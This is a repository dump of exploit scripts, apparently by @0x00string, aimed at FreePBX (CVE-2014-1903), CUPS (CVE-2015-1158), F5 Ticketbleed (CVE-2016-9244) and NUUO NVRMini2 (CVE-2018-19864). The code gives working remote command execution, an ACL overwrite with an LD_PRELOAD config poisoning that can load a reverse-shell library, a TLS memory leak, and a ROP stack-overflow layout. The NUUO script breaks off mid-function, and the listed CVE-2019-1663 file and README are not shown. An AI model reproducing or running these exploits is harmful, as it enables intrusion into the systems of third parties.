├── CVE-2014-1903.pl ├── CVE-2015-1158.py ├── CVE-2016-9244.py ├── CVE-2018-19864.py ├── CVE-2019-1663.py └── README.md /CVE-2014-1903.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | use strict; 3 | use warnings; 4 | use IO::Socket::INET; 5 | 6 | # Exploit Title: FreePBX 2.9,2.10,2.11,12 Remote Command Execution 7 | # Google Dork: n/a 8 | # Date: 2/25/14 9 | # Exploit Author: @0x00string 10 | # Vendor Homepage: http://www.freepbx.org/ 11 | # Software Link: http://mirror.freepbx.org/freepbx-2.11.0.tar.gz 12 | # Version: 2.11 tested working 13 | # Tested on: Ubuntu 12.04, 13.10 14 | # CVE : CVE-2014-1903 15 | 16 | 17 | # References: 18 | # http://seclists.org/bugtraq/2014/Feb/42 19 | # http://issues.freepbx.org/browse/FREEPBX-7123 20 | # http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1903 21 | # 22 | # Developer Advisory: 23 | # http://www.freepbx.org/news/2014-02-06/security-vulnerability-notice 24 | 25 | 26 | 27 | # in /admin/config.php 28 | # // handle special requests 29 | # if (!isset($no_auth) && isset($_REQUEST['handler'])) { 30 | # $module = isset($_REQUEST['module']) ? $_REQUEST['module'] : ''; 31 | # $file = isset($_REQUEST['file']) ? $_REQUEST['file'] : ''; 32 | # fileRequestHandler($_REQUEST['handler'], $module, $file); 33 | # exit(); 34 | # } 35 | 36 | 37 | # in /admin/library/view.functions.php 38 | # case 'api': 39 | # if (isset($_REQUEST['function']) && function_exists($_REQUEST['function'])) { 40 | # $function = $_REQUEST['function']; 41 | # $args = isset($_REQUEST['args'])?$_REQUEST['args']:''; 42 | # 43 | # //currently works for one arg functions, eventually need to clean this up to except more args 44 | # $result = $function($args); 45 | # $jr = json_encode($result); 46 | # } else { 47 | # $jr = json_encode(null); 48 | # } 49 | # header("Content-type: application/json"); 50 | # echo $jr; 51 | # break; 52 | 53 | 54 | $| = 1; 55 | 56 | my $sock = new IO::Socket::INET ( 57 | PeerHost => $ARGV[0], 58 | PeerPort => '80', 59 | Proto => 'tcp', 60 | ); 61 | die "$!\n" unless $sock; 62 | my $func = $ARGV[1]; 63 | my $args = ""; 64 | my $i = 0; 65 | my $max = 1; 66 | foreach(@ARGV) { 67 | if ($i > 1) { 68 | $args .= $_; 69 | } 70 | unless($i > (scalar(@ARGV) - 2)) { 71 | $args .= "%20"; 72 | } 73 | $i++; 74 | } 75 | my $payload = "display=A&handler=api&file=A&module=A&function=" . $func . "&args=" . $args; 76 | chomp($payload); 77 | print "payload is " . $payload . "\n"; 78 | my $packet = "GET http://" . $ARGV[0] . "/admin/config.php?" . $payload . "\r\n\r\n"; 79 | my $size = $sock->send($packet); 80 | shutdown($sock, 1); 81 | my $resp; 82 | $sock->recv($resp, 1024); 83 | print $resp . "\n"; 84 | $sock->close(); 85 | exit(0); 86 | -------------------------------------------------------------------------------- /CVE-2015-1158.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution 3 | # Google Dork: n/a 4 | # Date: 2/2/17 5 | # Exploit Author: @0x00string 6 | # Vendor Homepage: cups.org 7 | # Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2 8 | # Version: <2.0.3 9 | # Tested on: Ubuntu 14/15 10 | # CVE : CVE-2015-1158 11 | import os, re, socket, random, time, getopt, sys 12 | from socket import * 13 | from struct import * 14 | 15 | def banner(): 16 | print ''' 17 | lol ty google 18 | 0000000000000 19 | 0000000000000000000 00 20 | 00000000000000000000000000000 21 | 0000000000000000000000000000000 22 | 000000000 0000000000 23 | 00000000 0000000000 24 | 0000000 000000000000 25 | 0000000 000000000000000 26 | 000000 000000000 000000 27 | 0000000 000000000 000000 28 | 000000 000000000 000000 29 | 000000 000000000 000000 30 | 000000 00000000 000000 31 | 000000 000000000 000000 32 | 0000000 000000000 0000000 33 | 000000 000000000 000000 34 | 0000000000000000 0000000 35 | 0000000000000 0000000 36 | 00000000000 00000000 37 | 00000000000 000000000 38 | 0000000000000000000000000000000 39 | 00000000000000000000000000000 40 | 000 0000000000000000000 41 | 0000000000000 42 | @0x00string 43 | https://github.com/0x00string/oldays/blob/master/CVE-2015-1158.py 44 | ''' 45 | 46 | def usage (): 47 | print ("python script.py \n" 48 | " -h, --help: Show this message\n" 49 | " -a, --rhost: Target IP address\n" 50 | " -b, --rport: Target IPP service port\n" 51 | " -c, --lib /path/to/payload.so\n" 52 | " -f, --stomp-only Only stomp the ACL (no postex)\n" 53 | "\n" 54 | "Examples:\n" 55 | "python script.py -a 10.10.10.10 -b 631 -f\n" 56 | "python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\n") 57 | exit() 58 | 59 | def pretty (t, m): 60 | if (t is "+"): 61 | print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n", 62 | elif (t is "-"): 63 | print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n", 64 | elif (t is "*"): 65 | print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n", 66 | elif (t is "!"): 67 | print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n", 68 | 69 | def createDump (input): 70 | d, b, h = '', [], [] 71 | u = list(input) 72 | for e in u: 73 | h.append(e.encode("hex")) 74 | if e == '0x0': 75 | b.append('0') 76 | elif 30 > ord(e) or ord(e) > 128: 77 | b.append('.') 78 | elif 30 < ord(e) or ord(e) < 128: 79 | b.append(e) 80 | 81 | i = 0 82 | while i < len(h): 83 | if (len(h) - i ) >= 16: 84 | d += ' '.join(h[i:i+16]) 85 | d += " " 86 | d += ' '.join(b[i:i+16]) 87 | d += "\n" 88 | i = i + 16 89 | else: 90 | d += ' '.join(h[i:(len(h) - 0 )]) 91 | pad = len(' '.join(h[i:(len(h) - 0 )])) 92 | d += ' ' * (56 - pad) 93 | d += ' '.join(b[i:(len(h) - 0 )]) 94 | d += "\n" 95 | i = i + len(h) 96 | 97 | return d 98 | 99 | class tcpsock: 100 | def __init__(self, sock=None): 101 | if sock is None: 102 | self.sock = socket( 103 | AF_INET, SOCK_STREAM) 104 | self.sock.settimeout(30) 105 | else: 106 | self.sock = sock 107 | def connect(self, host, port): 108 | self.sock.connect((host, int(port))) 109 | def tx(self, msg): 110 | self.sock.send(msg) 111 | def rx(self): 112 | tmp = self.sock.recv(1024) 113 | msg = "" 114 | while tmp: 115 | msg += tmp 116 | tmp = self.sock.recv(1024) 117 | return msg 118 | 119 | def txrx (ip, port, proto, txpacket): 120 | if (proto is "tcp"): 121 | sock = tcpsock() 122 | elif (proto is "udp"): 123 | sock = udpsock() 124 | else: 125 | return None 126 | sock.connect(ip, port) 127 | sock.tx(txpacket) 128 | rxpacket = sock.rx() 129 | return rxpacket 130 | 131 | def locatePrinters(rhost, rport="631"): 132 | request = ( "GET /printers HTTP/1.1\x0d\x0a" 133 | "Host: " + rhost + ":" + rport + "\x0d\x0a" 134 | "User-Agent: CUPS/2.0.2\x0d\x0a" 135 | "Connection: Close\x0d\x0a" 136 | "\x0d\x0a") 137 | response = txrx(rhost, int(rport), "tcp", request) 138 | if response is not None: 139 | m = re.search('.+.+.+', response) 140 | if m is not None: 141 | printer = m.group(1) 142 | pretty("+","printer found: " + printer) 143 | return printer 144 | else: 145 | pretty("-","no printers") 146 | exit(1) 147 | else: 148 | pretty("-","no printers") 149 | exit(1) 150 | 151 | def preparePayload(libpath): 152 | with open(libpath, 'rb') as f: 153 | payload = f.read() 154 | if payload is not None: 155 | pretty("*","Payload:\n" + createDump(payload)) 156 | else: 157 | pretty("-","something went wrong") 158 | usage() 159 | return payload 160 | 161 | def seedTarget(rhost, rport, printer, payload): 162 | i = random.randint(1,3) 163 | reqid = str(pack(">i",(i+2))) 164 | reqid2 = str(pack(">i",(i+3))) 165 | printer_uri = "ipp://" + rhost + ":" + str(rport) + printer 166 | 167 | create_job_packet = ("\x02\x00" 168 | "\x00\x05"+ 169 | reqid+ 170 | "\x01" 171 | "\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8" 172 | "\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us" 173 | "\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri + 174 | "\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root" 175 | "\x42"+"\x00\x08"+"job-name"+"\x00\x06"+"badlib" 176 | "\x02" 177 | "\x21"+"\x00\x06"+"copies"+"\x00\x04"+"\x00\x00\x00\x01" 178 | "\x23"+"\x00\x0a"+"finishings"+"\x00\x04"+"\x00\x00\x00\x03" 179 | "\x42"+"\x00\x10"+"job-cancel-after"+"\x00\x05"+"\x31\x30\x38\x30\x30" 180 | "\x44"+"\x00\x0e"+"job-hold-until"+"\x00\x0a"+"indefinite" 181 | "\x21"+"\x00\x0c"+"job-priority"+"\x00\x04"+"\x00\x00\x00\x32" 182 | "\x42"+"\x00\x0a"+"job-sheets"+"\x00\x04"+"none"+"\x42"+"\x00\x00\x00\x04"+"none" 183 | "\x21"+"\x00\x09"+"number-up"+"\x00\x04"+"\x00\x00\x00\x01" 184 | "\x03") 185 | pretty("*","Sending createJob") 186 | 187 | http_header1 = ( "POST " + printer + " HTTP/1.1\x0d\x0a" 188 | "Content-Type: application/ipp\x0d\x0a" 189 | "Host: " + rhost + ":" + str(rport) + "\x0d\x0a" 190 | "User-Agent: CUPS/2.0.2\x0d\x0a" 191 | "Connection: Close\x0d\x0a" 192 | "Content-Length: " + str(len(create_job_packet) + 0) + "\x0d\x0a" 193 | "\x0d\x0a") 194 | 195 | createJobRequest = http_header1 + create_job_packet 196 | blah = txrx(rhost,int(rport),"tcp",createJobRequest) 197 | if blah is not None: 198 | m = re.search("ipp://" + rhost + ":" + str(rport) + "/jobs/(\d+)",blah) 199 | if m is not None: 200 | jobid = m.group(1) 201 | else: 202 | pretty("-","something went wrong"); 203 | exit() 204 | 205 | pretty("*","\n" + createDump(blah) + "\n") 206 | pretty("*", "Sending sendJob") 207 | 208 | send_document_packet = ("\x02\x00" 209 | "\x00\x06"+ 210 | reqid2+ 211 | "\x01" 212 | "\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8" 213 | "\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us" 214 | "\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri + 215 | "\x21"+"\x00\x06"+"job-id"+"\x00\x04"+ str(pack(">i", int(jobid))) + 216 | "\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root" 217 | "\x42"+"\x00\x0d"+"document-name"+"\x00\x06"+"badlib" 218 | "\x49"+"\x00\x0f"+"document-format"+"\x00\x18"+"application/octet-stream" 219 | "\x22"+"\x00\x0d"+"last-document"+"\x00\x01"+"\x01" 220 | "\x03"+ 221 | payload) 222 | 223 | http_header2 = ( "POST " + printer + " HTTP/1.1\x0d\x0a" 224 | "Content-Type: application/ipp\x0d\x0a" 225 | "Host: " + rhost + ":" + str(rport) + "\x0d\x0a" 226 | "User-Agent: CUPS/2.0.2\x0d\x0a" 227 | "Connection: Close\x0d\x0a" 228 | "Content-Length: " + str(len(send_document_packet) + 0) + "\x0d\x0a" 229 | "\x0d\x0a") 230 | 231 | sendJobRequest = http_header2 + send_document_packet 232 | blah2 = txrx(rhost,int(rport),"tcp",sendJobRequest) 233 | pretty("*","\n" + createDump(blah) + "\n") 234 | pretty("*","job id: " + jobid) 235 | return jobid 236 | 237 | def stompACL(rhost, rport, printer): 238 | i = random.randint(1,1024) 239 | printer_url = "ipp://" + rhost + ":" + rport + printer 240 | 241 | admin_stomp = ("\x02\x00" # vers 2.0 242 | "\x00\x05"+ # op id: Create Job (0x0005) 243 | str(pack(">i",(i+1)))+ 244 | "\x01" # op attributes marker 245 | "\x47" # charset 246 | "\x00\x12" # name len: 18 247 | "attributes-charset" 248 | "\x00\x08" # val len: 8 249 | "us-ascii" 250 | "\x48" # natural language 251 | "\x00\x1b" # name len: 27 252 | "attributes-natural-language" 253 | "\x00\x06" # val len: 6 254 | "/admin" 255 | "\x45" # printer-uri 256 | "\x00\x0b" # name len 11 257 | "printer-uri" + 258 | str(pack(">h", len(printer_url))) + printer_url + 259 | "\x42" # name without lang 260 | "\x00\x14" # name len: 20 261 | "requesting-user-name" 262 | "\x00\x06" # val len: 6 263 | "/admin" 264 | "\x02" # job attrs marker 265 | "\x21" # integer 266 | "\x00\x06" # name len: 6 267 | "copies" 268 | "\x00\x04" # val len: 4 269 | "\x00\x00\x00\x01" # 1 270 | "\x42" # name w/o lang 271 | "\x00\x19" # name len: 25 272 | "job-originating-host-name" 273 | "\x00\x0c" # val len: 12 274 | "AAAAAAAAAAAA" 275 | "\x42" # nwol 276 | "\x00\x00" # name len: 0 277 | "\x00\x0c" # val len: 12 278 | "AAAAAAAAAAAA" 279 | "\x42" # nwol 280 | "\x00\x00" # name len: 0 281 | "\x00\x0c" # val len: 12 282 | "AAAAAAAAAAAA" 283 | "\x42" # nwol 284 | "\x00\x00" # name len: 0 285 | "\x00\x0c" # val len: 12 286 | "AAAAAAAAAAAA" 287 | "\x42" # nwol 288 | "\x00\x00" # name len: 0 289 | "\x00\x0c" # val len: 12 290 | "AAAAAAAAAAAA" 291 | "\x42" # nwol 292 | "\x00\x00" # name len: 0 293 | "\x00\x0c" # val len: 12 294 | "AAAAAAAAAAAA" 295 | "\x42" # nwol 296 | "\x00\x00" # name len: 0 297 | "\x00\x0c" # val len: 12 298 | "AAAAAAAAAAAA" 299 | "\x42" # nwol 300 | "\x00\x00" # name len: 0 301 | "\x00\x0c" # val len: 12 302 | "AAAAAAAAAAAA" 303 | "\x42" # nwol 304 | "\x00\x00" # name len: 0 305 | "\x00\x0c" # val len: 12 306 | "AAAAAAAAAAAA" 307 | "\x42" # nwol 308 | "\x00\x00" # name len: 0 309 | "\x00\x0c" # val len: 12 310 | "AAAAAAAAAAAA" 311 | "\x42" # nwol 312 | "\x00\x00" # name len: 0 313 | "\x00\x0c" # val len: 12 314 | "AAAAAAAAAAAA" 315 | "\x42" # nwol 316 | "\x00\x00" # name len: 0 317 | "\x00\x0c" # val len: 12 318 | "AAAAAAAAAAAA" 319 | "\x36" # nwl 320 | "\x00\x00" # name len: 0 321 | "\x00\x16" # val len: 22 322 | "\x00\x06" # length 323 | "/admin" 324 | "\x00\x0c" 325 | "BBBBBBBBBBBB" 326 | "\x03") # end of attributes 327 | 328 | conf_stomp = ("\x02\x00" # vers 2.0 329 | "\x00\x05"+ # op id: Create Job (0x0005) 330 | str(pack(">i",(i+2)))+ 331 | "\x01" # op attributes marker 332 | "\x47" # charset 333 | "\x00\x12" # name len: 18 334 | "attributes-charset" 335 | "\x00\x08" # val len: 8 336 | "us-ascii" 337 | "\x48" # natural language 338 | "\x00\x1b" # name len: 27 339 | "attributes-natural-language" 340 | "\x00\x0b" # val len: 11 341 | "/admin/conf" 342 | "\x45" # printer-uri 343 | "\x00\x0b" # name len 11 344 | "printer-uri" + 345 | str(pack(">h", len(printer_url))) + printer_url + 346 | "\x42" # name without lang 347 | "\x00\x14" # name len: 20 348 | "requesting-user-name" 349 | "\x00\x0b" # val len: 11 350 | "/admin/conf" 351 | "\x02" # job attrs marker 352 | "\x21" # integer 353 | "\x00\x06" # name len: 6 354 | "copies" 355 | "\x00\x04" # val len: 4 356 | "\x00\x00\x00\x01" # 1 357 | "\x42" # name w/o lang 358 | "\x00\x19" # name len: 25 359 | "job-originating-host-name" 360 | "\x00\x0c" # val len: 12 361 | "AAAAAAAAAAAA" 362 | "\x42" # nwol 363 | "\x00\x00" # name len: 0 364 | "\x00\x0c" # val len: 12 365 | "AAAAAAAAAAAA" 366 | "\x42" # nwol 367 | "\x00\x00" # name len: 0 368 | "\x00\x0c" # val len: 12 369 | "AAAAAAAAAAAA" 370 | "\x42" # nwol 371 | "\x00\x00" # name len: 0 372 | "\x00\x0c" # val len: 12 373 | "AAAAAAAAAAAA" 374 | "\x42" # nwol 375 | "\x00\x00" # name len: 0 376 | "\x00\x0c" # val len: 12 377 | "AAAAAAAAAAAA" 378 | "\x42" # nwol 379 | "\x00\x00" # name len: 0 380 | "\x00\x0c" # val len: 12 381 | "AAAAAAAAAAAA" 382 | "\x42" # nwol 383 | "\x00\x00" # name len: 0 384 | "\x00\x0c" # val len: 12 385 | "AAAAAAAAAAAA" 386 | "\x42" # nwol 387 | "\x00\x00" # name len: 0 388 | "\x00\x0c" # val len: 12 389 | "AAAAAAAAAAAA" 390 | "\x42" # nwol 391 | "\x00\x00" # name len: 0 392 | "\x00\x0c" # val len: 12 393 | "AAAAAAAAAAAA" 394 | "\x42" # nwol 395 | "\x00\x00" # name len: 0 396 | "\x00\x0c" # val len: 12 397 | "AAAAAAAAAAAA" 398 | "\x42" # nwol 399 | "\x00\x00" # name len: 0 400 | "\x00\x0c" # val len: 12 401 | "AAAAAAAAAAAA" 402 | "\x42" # nwol 403 | "\x00\x00" # name len: 0 404 | "\x00\x0c" # val len: 12 405 | "AAAAAAAAAAAA" 406 | "\x36" # nwl 407 | "\x00\x00" # name len: 0 408 | "\x00\x1b" # val len: 27 409 | "\x00\x0b" # length 410 | "/admin/conf" 411 | "\x00\x0c" 412 | "BBBBBBBBBBBB" 413 | "\x03") # end of attributes 414 | 415 | http_header1 = ("POST " + printer + " HTTP/1.1\x0d\x0a" 416 | "Content-Type: application/ipp\x0d\x0a" 417 | "Host: " + rhost + ":" + rport + "\x0d\x0a" 418 | "User-Agent: CUPS/2.0.2\x0d\x0a" 419 | "Connection: Close\x0d\x0a" 420 | "Content-Length: " + str(len(admin_stomp)) + "\x0d\x0a" 421 | "\x0d\x0a") 422 | 423 | http_header2 = ("POST " + printer + " HTTP/1.1\x0d\x0a" 424 | "Content-Type: application/ipp\x0d\x0a" 425 | "Host: " + rhost + ":" + rport + "\x0d\x0a" 426 | "User-Agent: CUPS/2.0.2\x0d\x0a" 427 | "Connection: Close\x0d\x0a" 428 | "Content-Length: " + str(len(conf_stomp)) + "\x0d\x0a" 429 | "\x0d\x0a") 430 | 431 | pretty("*","stomping ACL") 432 | pretty("*",">:\n" + createDump(http_header1 + admin_stomp)) 433 | pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header1 + admin_stomp))) 434 | time.sleep(1) 435 | pretty("*",">:\n" + createDump(http_header2 + conf_stomp)) 436 | pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header2 + conf_stomp))) 437 | 438 | http_header_check = ("GET /admin HTTP/1.1\x0d\x0a" 439 | "Host: " + rhost + ":" + rport + "\x0d\x0a" 440 | "User-Agent: CUPS/2.0.2\x0d\x0a" 441 | "Connection: Close\x0d\x0a" 442 | "\x0d\x0a") 443 | pretty("*","checking /admin") 444 | pretty("*",">:\n" + createDump(http_header_check)) 445 | res = txrx(rhost,rport,"tcp",http_header_check) 446 | pretty("*","<:\n" + createDump(res)) 447 | m = re.search('200 OK', res) 448 | if m is not None: 449 | pretty("+","ACL stomp successful") 450 | else: 451 | pretty("-","exploit failed") 452 | exit(1) 453 | 454 | 455 | def getConfig(rhost, rport): 456 | i = random.randint(1,1024) 457 | original_config = "" 458 | http_request = ("GET /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a" 459 | "Host: " + rhost + ":" + rport + "\x0d\x0a" 460 | "User-Agent: CUPS/2.0.2\x0d\x0a" 461 | "Connection: Close\x0d\x0a" 462 | "\x0d\x0a") 463 | 464 | pretty("*","grabbing configuration file....") 465 | res = txrx(rhost,rport,"tcp",http_request) 466 | res_array = res.split("\x0d\x0a\x0d\x0a") 467 | original_config = res_array[1] 468 | pretty("*","config:\n" + original_config + "\n") 469 | return original_config 470 | 471 | def putConfig(rhost, rport, config): 472 | http_request = ("PUT /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a" 473 | "Content-Type: application/ipp\x0d\x0a" 474 | "Host: " + rhost + ":" + rport + "\x0d\x0a" 475 | "User-Agent: CUPS/2.0.2\x0d\x0a" 476 | "Connection: Keep-Alive\x0d\x0a" 477 | "Content-Length: " + str(len(config)) + "\x0d\x0a" 478 | "\x0d\x0a") 479 | pretty("*","overwriting config...") 480 | pretty("*",">:\n" + createDump(http_request + config)) 481 | pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_request + config))) 482 | 483 | def poisonConfig(config, name): 484 | config = config + "\x0a\x0aSetEnv LD_PRELOAD /var/spool/cups/d000" + name + "-001\x0a" 485 | return config 486 | 487 | def main(): 488 | rhost = None; 489 | rport = None; 490 | noshell = None; 491 | options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','lib=','stomp-only','help']) 492 | for opt, arg in options: 493 | if opt in ('-h', '--help'): 494 | usage() 495 | elif opt in ('-a','--rhost'): 496 | rhost = arg; 497 | elif opt in ('-b','--rport'): 498 | rport = arg; 499 | elif opt in ('-c','--lib'): 500 | libpath = arg; 501 | elif opt in ('-f','--stomp-only'): 502 | noshell = 1; 503 | banner() 504 | if rhost is None or rport is None: 505 | usage() 506 | pretty("*","locate available printer") 507 | printer = locatePrinters(rhost, rport) 508 | pretty("*","stomp ACL") 509 | stompACL(rhost, rport, printer) 510 | if (noshell is not None): 511 | pretty("*","fin") 512 | exit(0) 513 | pretty("*","prepare payload") 514 | payload = preparePayload(libpath) 515 | pretty("*","spray payload") 516 | jobid = seedTarget(rhost, rport, printer, payload) 517 | pretty("*","grab original config") 518 | OG_config = getConfig(rhost, rport) 519 | pretty("*","generate poison config") 520 | evil_config = poisonConfig(OG_config, jobid) 521 | pretty("*","upload poison config") 522 | putConfig(rhost, rport, evil_config) 523 | pretty("*","fin") 524 | exit(0); 525 | 526 | if __name__ == "__main__": 527 | main() 528 | -------------------------------------------------------------------------------- /CVE-2016-9244.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | #!/usr/bin/python 3 | # Exploit Title: Ticketbleed 4 | # Google Dork: n/a 5 | # Date: Exploit: 02/13/17, Advisory Published: 02/09/17 6 | # Exploit Author: @0x00string 7 | # Vendor Homepage: https://f5.com/ 8 | # Software Link: https://support.f5.com/csp/article/K05121675 9 | # Version: see software link for versions 10 | # Tested on: F5 BIGIP 11.6 11 | # CVE : CVE-2016-9244 12 | # require: scapy_ssl_tls (https://github.com/tintinweb/scapy-ssl_tls) 13 | import re, getopt, sys, socket 14 | from struct import * 15 | try: 16 | from scapy_ssl_tls.ssl_tls import * 17 | except ImportError: 18 | from scapy.layers.ssl_tls import * 19 | 20 | def banner(): 21 | print ''' 22 | lol ty filippo! 23 | ty tintinweb! 24 | 0000000000000 25 | 0000000000000000000 00 26 | 00000000000000000000000000000 27 | 0000000000000000000000000000000 28 | 000000000 0000000000 29 | 00000000 0000000000 30 | 0000000 000000000000 31 | 0000000 000000000000000 32 | 000000 000000000 000000 33 | 0000000 000000000 000000 34 | 000000 000000000 000000 35 | 000000 000000000 000000 36 | 000000 00000000 000000 37 | 000000 000000000 000000 38 | 0000000 000000000 0000000 39 | 000000 000000000 000000 40 | 0000000000000000 0000000 41 | 0000000000000 0000000 42 | 00000000000 00000000 43 | 00000000000 000000000 44 | 0000000000000000000000000000000 45 | 00000000000000000000000000000 46 | 000 0000000000000000000 47 | 0000000000000 48 | @0x00string 49 | https://github.com/0x00string/oldays/blob/master/CVE-2016-9244.py 50 | ''' 51 | 52 | def usage (): 53 | print ("python script.py \n" 54 | " -h, --help: Show this message\n" 55 | " -a, --rhost: Target IP address\n" 56 | " -b, --rport: Target port\n" 57 | "\n\n" 58 | "Examples:\n" 59 | "python script.py -a 10.10.10.10 -b 443\n" 60 | "python script.py --rhost 10.10.10.10 --rport 8443") 61 | exit() 62 | 63 | def pretty (t, m): 64 | if (t is "+"): 65 | print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n", 66 | elif (t is "-"): 67 | print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n", 68 | elif (t is "*"): 69 | print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n", 70 | elif (t is "!"): 71 | print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n", 72 | 73 | def createDump (input): 74 | d, b, h = '', [], [] 75 | u = list(input) 76 | for e in u: 77 | h.append(e.encode("hex")) 78 | if e == '0x0': 79 | b.append('0') 80 | elif 30 > ord(e) or ord(e) > 128: 81 | b.append('.') 82 | elif 30 < ord(e) or ord(e) < 128: 83 | b.append(e) 84 | 85 | i = 0 86 | while i < len(h): 87 | if (len(h) - i ) >= 16: 88 | d += ' '.join(h[i:i+16]) 89 | d += " " 90 | d += ' '.join(b[i:i+16]) 91 | d += "\n" 92 | i = i + 16 93 | else: 94 | d += ' '.join(h[i:(len(h) - 0 )]) 95 | pad = len(' '.join(h[i:(len(h) - 0 )])) 96 | d += ' ' * (56 - pad) 97 | d += ' '.join(b[i:(len(h) - 0 )]) 98 | d += "\n" 99 | i = i + len(h) 100 | return d 101 | 102 | def ticketBleed (rhost, rport): 103 | h = (rhost,int(rport)); 104 | version = TLSVersion.TLS_1_2 105 | secret = "" 106 | session_ticket = "" 107 | sid = "" 108 | cipher = TLSCipherSuite.ECDHE_RSA_WITH_AES_256_CBC_SHA 109 | with TLSSocket(socket.socket(), client=True) as sock: 110 | sock.connect(h) 111 | ctx = sock.tls_ctx 112 | packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=version, cipher_suites=TLS_CIPHER_SUITES.keys(), extensions=[TLSExtension() / TLSExtSessionTicketTLS(data="")]) 113 | sock.sendall(packet) 114 | sock.recvall() 115 | packet_ke = TLSRecord(version=version) / TLSHandshake() / ctx.get_client_kex_data() 116 | packet_ccs = TLSRecord(version=TLSVersion.TLS_1_2) / TLSChangeCipherSpec() 117 | sock.sendall(TLS.from_records([packet_ke, packet_ccs])) 118 | sock.sendall(to_raw(TLSFinished(), ctx)) 119 | ret = sock.recvall() 120 | session_ticket = ret[TLSSessionTicket].ticket 121 | secret = ctx.master_secret 122 | #pretty("*", "ctx 1: \n" + str(ctx)) 123 | with TLSSocket(socket.socket(), client=True) as sock: 124 | sock.connect(h) 125 | ctx = sock.tls_ctx 126 | packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=TLSVersion.TLS_1_2, cipher_suites=TLS_CIPHER_SUITES.keys(), session_id="A", extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=session_ticket)]) 127 | sock.tls_ctx.resume_session(secret) 128 | sock.sendall(packet) 129 | ret = sock.recvall() 130 | sid = ret[TLSServerHello].session_id 131 | #pretty("*", "ctx 2: \n" + str(ctx)) 132 | pretty("+", "bled 'A' + 31 bytes: \n" + createDump(sid)) 133 | 134 | def main(): 135 | rhost = None; 136 | rport = None; 137 | options, remainder = getopt.getopt(sys.argv[1:], 'a:b:h:', ['rhost=','rport=','help',]) 138 | for opt, arg in options: 139 | if opt in ('-h', '--help'): 140 | usage() 141 | elif opt in ('-a','--rhost'): 142 | rhost = arg; 143 | elif opt in ('-b','--rport'): 144 | rport = arg; 145 | banner() 146 | if rhost is None or rport is None: 147 | usage() 148 | ticketBleed(rhost,rport) 149 | exit(0); 150 | 151 | if __name__ == "__main__": 152 | main() 153 | -------------------------------------------------------------------------------- /CVE-2018-19864.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow 3 | # Google Dork: n/a 4 | # Date: Advisory Published: Nov 18 5 | # Exploit Author: @0x00string 6 | # Vendor Homepage: nuuo.com 7 | # Software Link: https://www.nuuo.com/ProductNode.php?node=2 8 | # Version: 3.9.1 and prior 9 | # Tested on: 3.9.1 10 | # CVE : CVE-2018-19864 11 | # 12 | # [ leading / ] 13 | # [ Padding x 335 ] 14 | # [ original value at stack pointer + 158 ] 15 | # [ padding x 80 ] 16 | # [ address of (pop {r3,lr} ; bx lr) ] 17 | # [ system() address ] 18 | # [ address of (mov r0,sp ; blx r3) ] 19 | # [ command to execute ] 20 | 21 | def banner(): 22 | print ''' 23 | @0x00string 24 | 0000000000000 25 | 0000000000000000000 00 26 | 00000000000000000000000000000 27 | 0000000000000000000000000000000 28 | 000000000 0000000000 29 | 00000000 0000000000 30 | 0000000 000000000000 31 | 0000000 000000000000000 32 | 000000 000000000 000000 33 | 0000000 000000000 000000 34 | 000000 000000000 000000 35 | 000000 000000000 000000 36 | 000000 00000000 000000 37 | 000000 000000000 000000 38 | 0000000 000000000 0000000 39 | 000000 000000000 000000 40 | 0000000000000000 0000000 41 | 0000000000000 0000000 42 | 00000000000 00000000 43 | 00000000000 000000000 44 | 0000000000000000000000000000000 45 | 00000000000000000000000000000 46 | 000 0000000000000000000 47 | 0000000000000 48 | https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py 49 | ''' 50 | 51 | def usage (): 52 | print ("python script.py \n" 53 | " -h, --help: Show this message\n" 54 | " -a, --rhost: Target IP address\n" 55 | " -b, --rport: Target Port - default 5150\n" 56 | " -c, --command: Command to execute\n" 57 | "\n" 58 | "Example:\n" 59 | "python script.py -a 10.10.10.10\n" 60 | "python script.py -a 10.10.10.10 -b 1234 -c reboot\n") 61 | exit() 62 | 63 | def main(): 64 | rhost = None; 65 | rport = "5150"; 66 | command = "{/bin/touch,/tmp/hax}" 67 | banner() 68 | options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','command=','help']) 69 | for opt, arg in options: 70 | if opt in ('-h', '--help'): 71 | usage() 72 | elif opt in ('-a','--rhost'): 73 | rhost = arg; 74 | elif opt in ('-b','--rport'): 75 | rport = arg; 76 | elif opt in ('-c','--command'): 77 | command = arg; 78 | print ("Sending exploit to execute [" + command + "]\n") 79 